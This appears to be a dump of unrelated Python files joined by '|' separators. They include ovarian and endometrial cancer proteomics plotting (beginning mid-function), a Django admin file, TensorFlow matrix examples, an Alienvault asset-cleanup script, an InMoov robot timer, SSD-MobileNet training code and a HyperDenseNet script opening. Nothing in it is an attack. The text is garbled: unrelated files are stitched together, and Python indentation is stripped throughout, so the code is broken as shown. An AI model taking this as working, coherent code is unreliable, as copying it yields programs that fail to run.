ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"] = ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].fillna("Normal")
# ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set_style("white")
order = ["Normal",
"IIIA",
"IIIB",
"IIIC",
"IV"]
ax = sns.boxplot(x = "Tumor_Stage_Ovary_FIGO",
y = i,
data = ov_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "Tumor_Stage_Ovary_FIGO",
y = i,
data = ov_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = ov_clinical_and_proteomics,
x = "Tumor_Stage_Ovary_FIGO",
y = i,
order = order,
boxPairList = [("Normal", "IIIA"),
("Normal", "IIIB"),
("Normal", "IIIC"),
("Normal", "IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('ovarian cancer')
ovcliplot(gene = "EIF4E")
###########################################################################
## Associating Clinical Variables with Transcriptomics in ovarian cancer ##
###########################################################################
## Merge clinical attribute with proteomics dataframe
def ov_tra_cli_plot(gene):
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
ov_clinical_and_proteomics.head()
cols = []
count = 1
for column in ov_clinical_and_proteomics.columns:
if column == gene + '_transcriptomics':
cols.append(gene + '_transcriptomics'+ str(count))
count+=1
continue
cols.append(column)
ov_clinical_and_proteomics.columns = cols
## Show possible variations of Histologic_type
ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in Genes:
print(i)
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
cols = []
count = 1
for column in ov_clinical_and_proteomics.columns:
if column == gene + '_transcriptomics':
cols.append(gene + '_transcriptomics'+ str(count))
count+=1
continue
cols.append(column)
ov_clinical_and_proteomics.columns = cols
ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Tumor"]
ax = sns.boxplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
showfliers = False,
order = order)
ax = sns.stripplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = ov_clinical_and_proteomics,
x = "Sample_Tumor_Normal",
y = i,
order = order,
boxPairList = [("Normal", "Tumor")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('ovarian cancer')
ov_tra_cli_plot(gene = "EIF4E")
### Extra controls
## correlation between JUN-S243 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.head())
gene_cross_en = gene_cross_en.dropna(subset = ['JUN-S243_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['JUN-S243_phosphoproteomics'],
gene_cross_en['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style ="white",
font_scale = 1.5)
plot = sns.regplot(x = gene_cross_en['JUN-S243_phosphoproteomics'],
y = gene_cross_en['SOX2_transcriptomics'],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-S243 phosphoproteomics',
ylabel = 'SOX2 transcriptomics',
title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-T239 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.head())
gene_cross_en = gene_cross_en.dropna(subset = ['JUN-T239_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['JUN-T239_phosphoproteomics'],
gene_cross_en['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style ="white",
font_scale = 1.5)
plot = sns.regplot(x = gene_cross_en['JUN-T239_phosphoproteomics'],
y = gene_cross_en['SOX2_transcriptomics'],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-T239 phosphoproteomics',
ylabel = 'SOX2 transcriptomics',
title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S58 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.head())
gene_cross_en = gene_cross_en.dropna(subset = ['JUN-S58_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['JUN-S58_phosphoproteomics'],
gene_cross_en['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style = "white")
plot = sns.regplot(x = gene_cross_en['JUN-S58_phosphoproteomics'],
y = gene_cross_en['SOX2_transcriptomics'],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-S58 phosphoproteomics',
ylabel = gene2 + ' transcriptomics',
title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S63 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.head())
gene_cross_en = gene_cross_en.dropna(subset = ['JUN-S63_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['JUN-S63_phosphoproteomics'],
gene_cross_en['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style = "white")
plot = sns.regplot(x = gene_cross_en['JUN-S63_phosphoproteomics'],
y = gene_cross_en['SOX2_transcriptomics'],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-S63 phosphoproteomics',
ylabel = gene2 + ' transcriptomics',
title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Endometrial Cancer)')
plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S63 and SOX2 mRNA in ovarian cancer
def ovcorrelationplot(gene1, gene2):
gene_cross_ov = ov.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_ov.head())
gene_cross_ov = gene_cross_ov.dropna(subset = ['JUN-S63s_phosphoproteomics'])
print(gene_cross_ov.head())
corr = pearsonr(gene_cross_ov['JUN-S63s_phosphoproteomics'],
gene_cross_ov['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style = "white")
plot = sns.regplot(x = gene_cross_ov['JUN-S63s_phosphoproteomics'],
y = gene_cross_ov['SOX2_transcriptomics'],
data = gene_cross_ov)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-S63 phosphoproteomics',
ylabel = gene2 + ' transcriptomics',
title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Ovarian Cancer)')
plt.show()
ovcorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S73 and SOX2 mRNA in ovarian cancer
def ovcorrelationplot(gene1, gene2):
gene_cross_ov = ov.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "transcriptomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_ov.head())
gene_cross_ov = gene_cross_ov.dropna(subset = ['JUN-S73s_phosphoproteomics'])
#gene_cross_ov = np.log2(gene_cross_ov)
print(gene_cross_ov.head())
corr = pearsonr(gene_cross_ov['JUN-S73s_phosphoproteomics'],
gene_cross_ov['SOX2_transcriptomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style = "white")
plot = sns.regplot(x = gene_cross_ov['JUN-S73s_phosphoproteomics'],
y = gene_cross_ov['SOX2_transcriptomics'],
data = gene_cross_ov)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'JUN-S73 phosphoproteomics',
ylabel = gene2 + ' transcriptomics',
title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Ovarian Cancer)')
plt.show()
ovcorrelationplot(gene1 = "JUN", gene2 = "SOX2")
|
from django.contrib import admin
from shrapnel.polls.models import Poll, PollAnswer, PollOption
admin.site.register(Poll)
admin.site.register(PollAnswer)
admin.site.register(PollOption)
|
import tensorflow as tf
import numpy as np
matrix1 = np.array([(2,2,2),(2,2,2),(2,2,2)],dtype = 'int32')
matrix2 = np.array([(1,1,1),(1,1,1),(1,1,1)],dtype = 'int32')
print (matrix1)
print (matrix2)
matrix1 = tf.constant(matrix1)
matrix2 = tf.constant(matrix2)
matrix_product = tf.matmul(matrix1, matrix2)
matrix_sum = tf.add(matrix1,matrix2)
matrix_3 = np.array([(2,7,2),(1,4,2),(9,0,2)],dtype = 'float32')
print (matrix_3)
matrix_det = tf.matrix_determinant(matrix_3)
with tf.Session() as sess:
result1 = sess.run(matrix_product)
result2 = sess.run(matrix_sum)
result3 = sess.run(matrix_det)
print (result1)
print (result2)
print (result3) |
# # The pdia Library: Process Data in Assessment
#
# ```
# Gary Feng & Fred Yan
# 2016, 2017
# Princeton, NJ
# ```
#
# This is a collection of functions written for processing the NAEP process data.
from pdia.dataImport.sql2csv import *
from pdia.dataImport.parsePearsonObservableXML import *
from pdia.utils.durSinceBlockStart import *
from pdia.extendedInfoParser.parseExtendedInfo import *
from pdia.utils.logger import *
from pdia.qc.dropBlocksMatching import *
from pdia.qc.dropDuplicatedEvents import *
from pdia.qc.dropStudents import *
from pdia.utils import *
errorCode = "ParsingError"
|
from __future__ import annotations
from pydantic import BaseModel, Field, validator
from typing import List, Optional
class MorphActionModel(BaseModel):
"""Morph Model - generated from the Morph module. A type of SchemaActionModel."""
name: str = Field(..., description="Name of the Action. Uppercase.")
title: str = Field(..., description="Title of the Action. Regular case.")
description: str = Field(..., description="Description of the purpose for performing this action.")
structure: Optional[List[str]] = Field(
default=[],
description="The structure of an action depends on source column fields, and integer row indices.",
)
class Config:
use_enum_values = True
anystr_strip_whitespace = True
validate_assignment = True
@validator("structure")
def check_valid_models(cls, v):
for s in v:
if not (s in ["columns", "rows", "source"]):
raise ValueError(f"Structure ({s}) must be of either `source`, `columns`, or `rows`.")
return v
|
#!/usr/bin/python
"""Alienvault Asset Removal Tool - For hosts that haven't been spotted in awhile.
Nicholas Albright
Copyright, 2017.
"""
import sys
import socket
import struct
import MySQLdb, MySQLdb.cursors
CONFIG_FILE = '/etc/ossim/ossim_setup.conf'
MYHOSTNAME = socket.gethostname()
REMOVE_OLDER_THAN = 30 # Remove assets older than XX days.
CURSOR = None
def clean_plugins(ipaddr, plugin_file='/etc/ossim/agent/config.yml'):
"""Clean up the OSSIM Plugins Configuration."""
r = ''
config_in = open(plugin_file, 'r').read()
for content in config_in.split('- /'):
if ipaddr in content:
continue
if r:
r += '- /' + content
else:
r += content
if r:
config_out = open(plugin_file, 'w')
config_out.write(r)
config_out.close()
return True
return False
def config_parse(conffile):
"""Parse Alienvault Config File to extract DB Credentials."""
parsed_config = {}
try:
config = open(conffile).read().splitlines()
for line in config:
if line.startswith('user=') or line.startswith('db_ip=') or line.startswith('pass='):
k, v = line.split('=', 1)
parsed_config[k] = v
except Exception as err:
sys.exit('Config Parser error: %s' % err)
return parsed_config
def db_connect(username, password):
"""Connect to Database."""
conn = MySQLdb.connect(host='127.0.0.1', user=username, passwd=password, db='alienvault')
return conn
def get_assets(remove_days=30):
"""Query Alienvault for all assets that haven't been spotted recently.
The frequency for the query can be specified using the param: remove_days
This parameter requires an integer and is checked for safe SQL handling.
"""
if type(remove_days) != int:
raise Exception('Error - Get_assets requires an integer.')
find_asset_sql = 'select hex(id),hex(ctx) from host where external_host = 0 and updated < DATE_SUB(NOW(), INTERVAL %s DAY);' % remove_days
CURSOR.execute(find_asset_sql)
r = [(x[0], x[1]) for x in CURSOR.fetchall()]
return r
def get_asset_ip(asset_hex_id):
"""Query OSSIM-DB for asset IP address."""
get_ip = 'SELECT hex(ip) from host_ip where host_id = unhex("%s")' % asset_hex_id
CURSOR.execute(get_ip)
x = CURSOR.fetchone()
if not x:
return False
return x[0]
def remove_from_ossim_db(host_id, host_ip, ctx_id, human_ip):
"""Remove Assets from OSSIM-DB."""
remove_sql = [
'UPDATE hids_agents SET host_id = NULL WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_scan WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_software WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_services WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_properties WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_types WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_sensor_reference WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_ip WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_plugin_sid WHERE host_ip IN (UNHEX("{host_ip}")) AND ctx = UNHEX("{ctx}");',
'DELETE FROM bp_member_status WHERE member_id = UNHEX("{host_id}");',
'DELETE FROM bp_asset_member WHERE member = UNHEX("{host_id}") AND type = "host";',
'DELETE FROM host_vulnerability WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_qualification WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host_group_reference WHERE host_id = UNHEX("{host_id}");',
'DELETE FROM host WHERE id = UNHEX("{host_id}");',
'DELETE FROM vuln_nessus_latest_reports WHERE hostIP IN ("{human_ip}");',
'DELETE FROM vuln_nessus_latest_results WHERE hostIP IN ("{human_ip}");'
]
for row in remove_sql:
CURSOR.execute(row.format(host_id=host_id, ctx=ctx_id, host_ip=host_ip, human_ip=human_ip))
if __name__ == '__main__':
if len(sys.argv) == 2:
REMOVE_OLDER_THAN = int(sys.argv[1])
pc = config_parse(CONFIG_FILE)
mysql_conn = db_connect(pc['user'], pc['pass'])
CURSOR = mysql_conn.cursor()
asset_hexids = get_assets(REMOVE_OLDER_THAN)
print('%s assets identifed.' % len(asset_hexids))
# raw_input('Press any key to continue...')
for row in asset_hexids:
asset_id, ctx = row
print('Removing: %s...' % asset_id)
hexip = get_asset_ip(asset_id)
if not hexip:
human_ip = 'BROKEN_LINK_BAD_DB_ENTRY'
hexip = '00'
else:
human_ip = socket.inet_ntoa(struct.pack('!L', int(hexip, 16)))
remove_from_ossim_db(asset_id, hexip, ctx, human_ip)
mysql_conn.commit()
|
import random
from time import sleep
i01 = Runtime.createAndStart("i01", "InMoov")
i01.startHead("COM3")
sleep(1)
#this is a function that do a job ( called inside the timer )
def MoveHeadRandomize():
if IcanMoveHeadRandom==1:
i01.moveHead(random.randint(50,130),random.randint(50,130))
#we create the timer object
MoveHeadTimer = Runtime.start("MoveHeadTimer","Clock")
MoveHeadTimer.setInterval(1001)
#this is the main timer function called by the time
def MoveHead(timedata):
MoveHeadRandomize()
#we random the next time
MoveHeadTimer.setInterval(random.randint(600,1200))
#this is called when we use MoveHeadTimer.stopClock()
def MoveHeadStopped():
if IcanMoveHeadRandom==1:
i01.moveHead(90,90)
HeadSide.moveTo(90)
#this is called when we use MoveHeadTimer.startClock()
def MoveHeadStart():
MoveHeadRandomize()
MoveHeadTimer.addListener("pulse", python.name, "MoveHead")
MoveHeadTimer.addListener("clockStopped", python.name, "MoveHeadStopped")
MoveHeadTimer.addListener("clockStarted", python.name, "MoveHeadStart")
#we start the clock
MoveHeadTimer.startClock()
#start to move head random 10 seconds
IcanMoveHeadRandom=1
sleep(10)
IcanMoveHeadRandom=0
|
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
import ssd_mobilenet_v1 as ssd
from datasets import dataset_factory
from preprocessing import preprocessing_factory
import tf_utils
import os
import pdb
slim = tf.contrib.slim
# ssd network flags
tf.app.flags.DEFINE_float(
'match_threshold', 0.5, 'Matching threshold in the loss function.')
tf.app.flags.DEFINE_float(
'loss_alpha', 1., 'Alpha parameter in the loss function.')
tf.app.flags.DEFINE_float(
'negative_ratio', 3., 'Negative ratio in the loss function.')
# General flags
tf.app.flags.DEFINE_integer(
'num_readers', 4,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_string(
'train_dir', './logs',
'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer(
'num_preprocessing_threads', 4,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 10,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 600,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 600,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_float(
'gpu_memory_fraction', 0.5, 'GPU memory fraction to use.')
# learning rate flags.
tf.app.flags.DEFINE_string(
'learning_rate_decay_type',
'exponential',
'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
' or "polynomial"')
tf.app.flags.DEFINE_float(
"learning_rate_decay_factor",
0.94,"Learning rate decay factor.")
tf.app.flags.DEFINE_float(
"num_epochs_per_decay",2.0,
"Number of epochs after which learning rate decays.")
tf.app.flags.DEFINE_float(
"learning_rate",0.01,"Initial learning rate.")
tf.app.flags.DEFINE_float(
"end_learning_rate",0.0001,"The minimum end learning rate used by polynomial decay learning rate.")
tf.app.flags.DEFINE_float(
'moving_average_decay', 0.9999,
'The decay to use for the moving average.'
'If left as None, then moving averages are not used.')
# optimization flags, only support RMSprop in this version
tf.app.flags.DEFINE_float(
"weight_decay",0.00004,"The weight decay on the model weights.")
tf.app.flags.DEFINE_float(
'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_string(
"optimizer","rmsprop",
"The name of the optimizer, only support `rmsprop`.")
tf.app.flags.DEFINE_float(
'momentum', 0.9,
'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
# dataset flags
tf.app.flags.DEFINE_string(
'dataset_name', 'pascalvoc_2007', 'The name of the dataset to load.')
tf.app.flags.DEFINE_integer(
'num_classes', 21, 'Number of classes to use in the dataset.')
tf.app.flags.DEFINE_string(
'dataset_split_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
'dataset_dir', None, 'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_string(
'preprocessing_name', "ssd_512_vgg", 'The name of the preprocessing to use.')
tf.app.flags.DEFINE_integer(
'batch_size', 32, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
'train_image_size', None, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
'The maximum number of training steps.')
# fine-tuning flags
tf.app.flags.DEFINE_string(
'checkpoint_path', None,
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'trainable_scopes', None,
'Comma-separated list of scopes to filter the set of variables to train.'
'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
'ignore_missing_vars', True,
'When restoring a checkpoint would ignore missing variables.')
tf.app.flags.DEFINE_boolean(
'train_on_cpu', False,
'Set as `True` will make use of CPU for training.')
tf.app.flags.DEFINE_string(
"gpu_device","0",
"Set used gpu id for training.")
tf.app.flags.DEFINE_boolean("allow_growth",True,
"If allow increasing use of memory of GPU.")
FLAGS = tf.app.flags.FLAGS
def main(_):
if FLAGS.train_on_cpu:
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
else:
os.environ["CUDA_VISIBLE_DEVICES"]=FLAGS.gpu_device
if not FLAGS.dataset_dir:
raise ValueError("You must supply the dataset directory with --dataset-dir.")
tf.logging.set_verbosity(tf.logging.DEBUG)
g = tf.Graph()
with g.as_default():
# select the dataset
dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, FLAGS.dataset_split_name,FLAGS.dataset_dir)
# create global step, used for optimizer moving average decay
with tf.device("/cpu:0"):
global_step = tf.train.create_global_step()
# pdb.set_trace()
# get the ssd network and its anchors
ssd_cls = ssd.SSDnet
ssd_params = ssd_cls.default_params._replace(num_classes=FLAGS.num_classes)
ssd_net = ssd_cls(ssd_params)
image_size = ssd_net.params.img_shape
ssd_anchors = ssd_net.anchors(img_shape=image_size)
# select the preprocessing function
preprocessing_name = FLAGS.preprocessing_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,is_training=True)
tf_utils.print_configuration(FLAGS.__flags,ssd_params,
dataset.data_sources,FLAGS.train_dir)
# create a dataset provider and batches.
with tf.device("/cpu:0"):
with tf.name_scope(FLAGS.dataset_name+"_data_provider"):
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
num_readers=FLAGS.num_readers,
common_queue_capacity=20*FLAGS.batch_size,
common_queue_min=10*FLAGS.batch_size,
shuffle=True)
# get for ssd network: image,labels,bboxes
[image,shape,glabels,gbboxes] = provider.get(["image","shape",
"object/label",
"object/bbox"])
# pdb.set_trace()
# preprocessing
image,glabels,gbboxes = \
image_preprocessing_fn(image,
glabels,gbboxes,
out_shape=image_size,
data_format="NHWC")
# encode groundtruth labels and bboxes
gclasses,glocalisations,gscores= \
ssd_net.bboxes_encode(glabels,gbboxes,ssd_anchors)
batch_shape = [1] + [len(ssd_anchors)] * 3
# training batches and queue
r = tf.train.batch(
tf_utils.reshape_list([image, gclasses, glocalisations, gscores]),
batch_size=FLAGS.batch_size,
num_threads=FLAGS.num_preprocessing_threads,
capacity=5*FLAGS.batch_size)
b_image,b_gclasses,b_glocalisations,b_gscores = \
tf_utils.reshape_list(r,batch_shape)
# prefetch queue
batch_queue = slim.prefetch_queue.prefetch_queue(
tf_utils.reshape_list([b_image,b_gclasses,b_glocalisations,b_gscores]),
capacity = 8)
# dequeue batch
b_image, b_gclasses, b_glocalisations, b_gscores = \
tf_utils.reshape_list(batch_queue.dequeue(), batch_shape)
# gather initial summaries
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
arg_scope = ssd_net.arg_scope(weight_decay=FLAGS.weight_decay)
with slim.arg_scope(arg_scope):
predictions,localisations,logits,end_points,mobilenet_var_list = \
ssd_net.net(b_image,is_training=True)
# add loss function
ssd_net.losses(logits,localisations,
b_gclasses,b_glocalisations,b_gscores,
match_threshold=FLAGS.match_threshold,
negative_ratio=FLAGS.negative_ratio,
alpha=FLAGS.loss_alpha,
label_smoothing=FLAGS.label_smoothing)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# add summaries for end_points
for end_point in end_points:
x = end_points[end_point]
summaries.add(tf.summary.histogram("activations/"+end_point,x))
summaries.add(tf.summary.scalar("sparsity/"+end_point,
tf.nn.zero_fraction(x)))
# add summaries for losses and extra losses
for loss in tf.get_collection(tf.GraphKeys.LOSSES):
summaries.add(tf.summary.scalar(loss.op.name,loss))
for loss in tf.get_collection("EXTRA_LOSSES"):
summaries.add(tf.summary.scalar(loss.op.name,loss))
# add summaries for variables
for var in slim.get_model_variables():
summaries.add(tf.summary.histogram(var.op.name,var))
# configure the moving averages
if FLAGS.moving_average_decay: # use moving average decay on weights variables
moving_average_variables = slim.get_model_variables()
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay,global_step)
else:
moving_average_variables,variable_averages = None,None
# configure the optimization procedure
with tf.device("/cpu:0"):
learning_rate = tf_utils.configure_learning_rate(FLAGS,
dataset.num_samples,global_step)
optimizer = tf_utils.configure_optimizer(FLAGS,learning_rate)
summaries.add(tf.summary.scalar("learning_rate",learning_rate))
if FLAGS.moving_average_decay:
# update ops executed by trainer
update_ops.append(variable_averages.apply(moving_average_variables))
# get variables to train
variables_to_train = tf_utils.get_variables_to_train(FLAGS)
# return a train tensor and summary op
total_losses = tf.get_collection(tf.GraphKeys.LOSSES)
total_loss = tf.add_n(total_losses,name="total_loss")
summaries.add(tf.summary.scalar("total_loss",total_loss))
# create gradient updates
grads = optimizer.compute_gradients(total_loss,var_list=variables_to_train)
grad_updates = optimizer.apply_gradients(grads,global_step=global_step)
update_ops.append(grad_updates)
# create train op
update_op = tf.group(*update_ops)
train_tensor = control_flow_ops.with_dependencies([update_op],total_loss,
name="train_op")
# merge all summaries together
summary_op = tf.summary.merge(list(summaries),name="summary_op")
# start training
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction,allow_growth=FLAGS.allow_growth)
config = tf.ConfigProto(log_device_placement=False,
gpu_options=gpu_options)
saver = tf.train.Saver(max_to_keep=2,
keep_checkpoint_every_n_hours=1.0,
write_version=2,
pad_step_number=False)
# create initial assignment op
init_assign_op,init_feed_dict = slim.assign_from_checkpoint(
FLAGS.checkpoint_path,mobilenet_var_list,
ignore_missing_vars=FLAGS.ignore_missing_vars)
# create an initial assignment function
for k,v in init_feed_dict.items():
if "global_step" in k.name:
g_step = k
init_feed_dict[g_step] = 0 # change the global_step to zero.
init_fn = lambda sess: sess.run(init_assign_op,init_feed_dict)
# run training
slim.learning.train(train_tensor,logdir=FLAGS.train_dir,
init_fn=init_fn,
summary_op=summary_op,
number_of_steps=FLAGS.max_number_of_steps,
save_summaries_secs=FLAGS.save_summaries_secs,
save_interval_secs=FLAGS.save_interval_secs,
session_config=config,
saver=saver,
)
# slim.learning.train(
# train_tensor,
# logdir=FLAGS.train_dir,
# init_fn =tf_utils.get_init_fn(FLAGS,mobilenet_var_list),
# summary_op=summary_op,
# global_step=global_step,
# number_of_steps=FLAGS.max_number_of_steps,
# log_every_n_steps=FLAGS.log_every_n_steps,
# save_summaries_secs=FLAGS.save_summaries_secs,
# saver=saver,
# save_interval_secs =FLAGS.save_interval_secs,
# session_config=config,
# sync_optimizer=None)
if __name__ == '__main__':
tf.app.run()
|
"""
Copyright (c) 2016, Jose Dolz .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Jose Dolz. April, 2018.
email: jose.dolz.upv@gmail.com
LIVIA Department, ETS, Montreal.
"""
import pdb
import os
from HyperDenseNet import HyperDenseNet3D
from Modules.General.Utils import dump_model_to_gzip_file
from Modules.General.Utils import makeFolder
from Modules.Parsers.parsersUtils import parserConfigIni
def generateNetwork(configIniName) :
myParserConfigIni = parserConfigIni()
myParserConfigIni.readConfigIniFile(configIniName,0)
print " ********************** Starting creation model **********************"
print " ------------------------ General ------------------------ "
print " - Network name: {}".format(myParserConfigIni.networkName)
print " - Folder to save the outputs: {}".format(myParserConfigIni.folderName)
print " ------------------------ CNN Architecture ------------------------ "
print " - Number of classes: {}".format(myParserConfigIni.n_classes)
